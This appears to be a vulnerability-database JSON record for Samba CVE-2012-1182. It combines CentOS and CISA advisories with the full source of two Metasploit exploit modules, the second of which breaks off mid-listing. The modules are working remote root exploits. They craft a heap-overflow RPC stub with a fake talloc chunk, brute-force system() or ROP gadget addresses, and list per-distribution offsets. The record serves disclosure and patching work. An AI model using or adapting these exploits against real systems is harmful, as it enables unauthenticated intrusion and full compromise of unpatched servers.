"https://ubuntu.com/security/notices/USN-1423-1", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T17:25:25", "description": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow. CVE-2012-1182. Remote exploit for linux platform", "published": "2012-10-10T00:00:00", "type": "exploitdb", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "modified": "2012-10-10T00:00:00", "id": "EDB-ID:21850", "href": "https://www.exploit-db.com/exploits/21850/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\tinclude Msf::Exploit::Brute\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module triggers a vulnerability in the LSA RPC service of the Samba daemon\r\n\t\t\t\tbecause of an error on the PIDL auto-generated code. Making a specially crafted\r\n\t\t\t\tcall to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\r\n\t\t\t\ttrigger a heap overflow and finally execute arbitrary code with root privileges.\r\n\r\n\t\t\t\tThe module uses brute force to guess the system() address and redirect flow there\r\n\t\t\t\tin order to bypass NX. The start and stop addresses for brute forcing have been\r\n\t\t\t\tcalculated empirically. On the other hand the module provides the StartBrute and\r\n\t\t\t\tStopBrute which allow the user to configure his own addresses.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'blasty', # Exploit\r\n\t\t\t\t\t'mephos', # Debian Squeeze target\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2012-1182'],\r\n\t\t\t\t\t['OSVDB', '81303'],\r\n\t\t\t\t\t['BID', '52973'],\r\n\t\t\t\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 811,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic bash telnet python perl'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1'\r\n\t\t\t\t\t['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start for the final version should be 0xb20 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230b20 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00b20 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x950 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230950 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00950 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x680 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230680 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00680 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x680 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6aaa1b0 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xb6ce91b0 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 10 2012',\r\n\t\t\t'DefaultTarget' => 0\r\n\t\t\t))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]),\r\n\t\t\tOptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ])\r\n\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tif target.bruteforce?\r\n\t\t\tbf = target.bruteforce\r\n\r\n\t\t\tif datastore['StartBrute'] and datastore['StartBrute'] > 0\r\n\t\t\t\tbf.start_addresses['Ret'] = datastore['StartBrute']\r\n\t\t\tend\r\n\r\n\t\t\tif datastore['StopBrute'] and datastore['StopBrute'] > 0\r\n\t\t\t\tbf.stop_addresses['Ret'] = datastore['StopBrute']\r\n\t\t\tend\r\n\r\n\t\t\tif bf.start_addresses['Ret'] > bf.stop_addresses['Ret']\r\n\t\t\t\traise ArgumentError, \"StartBrute should not be larger than StopBrute\"\r\n\t\t\tend\r\n\t\tend\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef check\r\n\t\tbegin\r\n\t\t\tconnect()\r\n\t\t\tsmb_login()\r\n\t\t\tdisconnect()\r\n\r\n\t\t\tversion = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0]\r\n\t\t\tminor = version.scan(/\\.(\\d*)$/).flatten[0].to_i\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4\r\n\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\r\n\t\trescue ::Exception\r\n\t\t\treturn CheckCode::Unknown\r\n\t\tend\r\n\tend\r\n\r\n\tdef brute_exploit(target_addrs)\r\n\r\n\t\tprint_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['Ret'])\r\n\t\tdatastore['DCERPC::fake_bind_multi'] = false\r\n\t\tdatastore['DCERPC::max_frag_size'] = 4248\r\n\r\n\t\tpipe = \"lsarpc\"\r\n\r\n\t\tprint_status(\"Connecting to the SMB service...\")\r\n\t\tconnect()\r\n\t\tprint_status(\"Login to the SMB service...\")\r\n\t\tsmb_login()\r\n\r\n\t\thandle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\tstub = \"X\" * 20\r\n\r\n\t\tcmd = \";;;;\" # padding\r\n\t\tcmd << \"#{payload.encoded}\\x00\" # system argument\r\n\t\ttmp = cmd * (816/cmd.length)\r\n\t\ttmp << \"\\x00\"*(816-tmp.length)\r\n\r\n\t\tstub << NDR.short(2) # level\r\n\t\tstub << NDR.short(2) # level 2\r\n\t\tstub << NDR.long(1) # auditing mode\r\n\t\tstub << NDR.long(1) # ptr\r\n\t\tstub << NDR.long(100000) # r-> count\r\n\t\tstub << NDR.long(20) # array size\r\n\t\tstub << NDR.long(0)\r\n\t\tstub << NDR.long(100)\r\n\t\tstub << rand_text_alpha(target['Offset'])\r\n\t\t# Crafted talloc chunk\r\n\t\tstub << 'A' * 8 # next, prev\r\n\t\tstub << NDR.long(0) + NDR.long(0) # parent, child\r\n\t\tstub << NDR.long(0) # refs\r\n\t\tstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP\r\n\t\tstub << NDR.long(0) # name\r\n\t\tstub << \"AAAA\" # size\r\n\t\tstub << NDR.long(0xe8150c70) # flags\r\n\t\tstub << \"AAAABBBB\"\r\n\t\tstub << tmp # pointer to tmp+4 in $esp\r\n\t\tstub << rand_text(32632)\r\n\t\tstub << rand_text(62000)\r\n\r\n\t\tprint_status(\"Calling the vulnerable function...\")\r\n\r\n\t\tbegin\r\n\t\t\tcall(dcerpc, 0x08, stub)\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\r\n\t\t\tprint_status('Server did not respond, this is expected')\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::Fault\r\n\t\t\tprint_error('Server is most likely patched...')\r\n\t\trescue => e\r\n\t\t\tif e.to_s =~ /STATUS_PIPE_DISCONNECTED/\r\n\t\t\t\tprint_status('Server disconnected, this is expected')\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\t# Perform a DCE/RPC Function Call\r\n\tdef call(dcerpc, function, data, do_recv = true)\r\n\r\n\t\tfrag_size = data.length\r\n\t\tif dcerpc.options['frag_size']\r\n\t\t\tfrag_size = dcerpc.options['frag_size']\r\n\t\tend\r\n\t\tobject_id = ''\r\n\t\tif dcerpc.options['object_call']\r\n\t\t\tobject_id = dcerpc.handle.uuid[0]\r\n\t\tend\r\n\t\tif options['random_object_id']\r\n\t\t\tobject_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))\r\n\t\tend\r\n\r\n\t\tcall_packets = make_request(function, data, frag_size, dcerpc.context, object_id)\r\n\t\tcall_packets.each { |packet|\r\n\t\t\twrite(dcerpc, packet)\r\n\t\t}\r\n\r\n\t\treturn true if not do_recv\r\n\r\n\t\traw_response = ''\r\n\r\n\t\tbegin\r\n\t\t\traw_response = dcerpc.read()\r\n\t\trescue ::EOFError\r\n\t\t\traise Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\tend\r\n\r\n\t\tif (raw_response == nil or raw_response.length == 0)\r\n\t\t\traise Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\tend\r\n\r\n\r\n\t\tdcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response)\r\n\r\n\t\tif dcerpc.last_response.type == 3\r\n\t\t\te = Rex::Proto::DCERPC::Exceptions::Fault.new\r\n\t\t\te.fault = dcerpc.last_response.status\r\n\t\t\traise e\r\n\t\tend\r\n\r\n\t\tdcerpc.last_response.stub_data\r\n\tend\r\n\r\n\t# Used to create standard DCERPC REQUEST packet(s)\r\n\tdef make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '')\r\n\r\n\t\topnum = opnum.to_i\r\n\t\tsize = size.to_i\r\n\t\tctx = ctx.to_i\r\n\r\n\t\tchunks, frags = [], []\r\n\t\tptr = 0\r\n\r\n\t\t# Break the request into fragments of 'size' bytes\r\n\t\twhile ptr < data.length\r\n\t\t\tchunks.push( data[ ptr, size ] )\r\n\t\t\tptr += size\r\n\t\tend\r\n\r\n\t\t# Process requests with no stub data\r\n\t\tif chunks.length == 0\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )\r\n\t\t\treturn frags\r\n\t\tend\r\n\r\n\t\t# Process requests with only one fragment\r\n\t\tif chunks.length == 1\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )\r\n\t\t\treturn frags\r\n\t\tend\r\n\r\n\t\t# Create the first fragment of the request\r\n\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )\r\n\r\n\t\t# Create all of the middle fragments\r\n\t\twhile chunks.length != 1\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )\r\n\t\tend\r\n\r\n\t\t# Create the last fragment of the request\r\n\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )\r\n\r\n\t\treturn frags\r\n\tend\r\n\r\n\t# Write data to the underlying socket\r\n\tdef write(dcerpc, data)\r\n\t\tdcerpc.socket.write(data)\r\n\t\tdata.length\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21850/"}], "centos": [{"lastseen": "2019-12-20T18:25:36", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0466\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030599.html\n\n**Affected packages:**\nsamba3x\nsamba3x-client\nsamba3x-common\nsamba3x-doc\nsamba3x-domainjoin-gui\nsamba3x-swat\nsamba3x-winbind\nsamba3x-winbind-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0466.html", "edition": 3, "modified": "2012-04-10T21:13:02", "published": "2012-04-10T21:13:02", "href": "http://lists.centos.org/pipermail/centos-announce/2012-April/030599.html", "id": "CESA-2012:0466", "title": "samba3x security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:55", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0465\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030600.html\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030603.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-doc\nsamba-domainjoin-gui\nsamba-swat\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\n\n**Upstream details at:**\n", "edition": 3, "modified": "2012-04-10T23:59:51", "published": "2012-04-10T21:30:27", "href": "http://lists.centos.org/pipermail/centos-announce/2012-April/030600.html", "id": "CESA-2012:0465", "title": "libsmbclient, samba security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T13:21:02", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0506\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031536.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006889.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-swat\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0506.html", "edition": 7, "modified": "2013-03-09T00:42:54", "published": "2013-02-27T19:38:13", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-February/006889.html", "id": "CESA-2013:0506", "title": "samba4 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T13:20:22", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0515\n\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031358.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031491.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006708.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006844.html\n\n**Affected packages:**\nevolution-mapi\nevolution-mapi-devel\nopenchange\nopenchange-client\nopenchange-devel\nopenchange-devel-docs\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0515.html", "edition": 87, "modified": "2013-03-09T00:42:10", "published": "2013-02-27T19:34:43", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-February/006708.html", "id": "CESA-2013:0515", "title": "evolution, openchange security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:08:38", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "description": "Samba has released an update to address a vulnerability in Samba versions 3.6.3 and all previous versions. Exploitation of this vulnerability may allow a remote attacker to use anonymous connections to execute arbitrary code with root privileges. \n \nUS-CERT encourages users and administrators to review the recent [Samba Security Announcement](<https://www.samba.org/samba/security/CVE-2012-1182>) and apply any necessary updates to help mitigate the risk. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2012/04/11/Samba-Releases-Updates-30x-363>); we'd welcome your feedback.\n", "modified": "2012-10-23T00:00:00", "published": "2012-04-11T00:00:00", "id": "CISA:C73BC9C5DAF991808EA4A267072DA584", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/04/11/Samba-Releases-Updates-30x-363", "type": "cisa", "title": "Samba Releases Updates for 3.0.x - 3.6.3 ", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:14:50", "description": "This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to trigger a heap overflow and finally execute arbitrary code with root privileges. The module uses brute force to guess the stackpivot/rop chain or the system() address and redirect flow there in order to bypass NX. The start and stop addresses for brute forcing have been calculated empirically. On the other hand the module provides the StartBrute and StopBrute which allow the user to configure his own addresses.\n", "published": "2012-09-27T23:18:52", "type": "metasploit", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::RopDb\n include Msf::Exploit::Brute\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',\n 'Description' => %q{\n This module triggers a vulnerability in the LSA RPC service of the Samba daemon\n because of an error on the PIDL auto-generated code. Making a specially crafted\n call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\n trigger a heap overflow and finally execute arbitrary code with root privileges.\n\n The module uses brute force to guess the stackpivot/rop chain or the system()\n address and redirect flow there in order to bypass NX. The start and stop addresses\n for brute forcing have been calculated empirically. On the other hand the module\n provides the StartBrute and StopBrute which allow the user to configure his own\n addresses.\n },\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'blasty', # Exploit\n 'mephos', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2012-1182'],\n ['OSVDB', '81303'],\n ['BID', '52973'],\n ['ZDI', '12-069']\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 600,\n },\n 'Platform' => %w{ linux unix },\n # smbd process is killed soon after being exploited, need fork with meterpreter\n 'DefaultOptions' => { \"PrependSetreuid\" => true, \"PrependSetregid\" => true, \"PrependFork\" => true, \"AppendExit\" => true, \"WfsDelay\" => 5},\n 'Targets' =>\n [\n ['2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb67f1000 },\n 'Stop' => { 'libgcrypt_base' => 0xb69ef000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb68d9000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6ad7000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2',\n # when stack pivoting, we control dword [esi] (field \"next\" in talloc chunk), ecx and [esp+4] point to shellcode\n 'Stackpivot' => 0x0006af03, # pop ecx ; jmp dword [esi] in /lib/i386-linux-gnu/libgcrypt.so.11.6.0\n # we jump on \"pop ecx, jmp dword [esi] to remove 4 bytes from the stack, then jump on pop esp.. gadget\n # to effectively stack pivot\n 'Stackpivot_helper' => 0x00054e87, #pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret ;\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6973000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b71000 },\n 'Step' => 0x1000\n }\n }\n ],\n # default version when installing 11.04 is 3.5.8 , 3.5.4 was PROPOSED on CD months before release date\n #['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',\n #\t{\n #\t\t'Arch' => ARCH_CMD,\n #\t\t'Offset' => 0x11c0,\n #\t\t'Ropname' => 'Ubuntu 11.04 / 2:3.5.4~dfsg-1ubuntu8',\n #\t\t'Stackpivot' => 0,\n #\t\t'Bruteforce' =>\n #\t\t{\n #\t\t\t# The start should be 0x950 aligned, and then step 0x1000.\n #\t\t\t'Start' => { 'Ret' => 0x00230950 },\n #\t\t\t'Stop' => { 'Ret' => 0x22a00950 },\n #\t\t\t'Step' => 0x1000\n #\t\t}\n #\t}\n #],\n ['2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 10.10 / 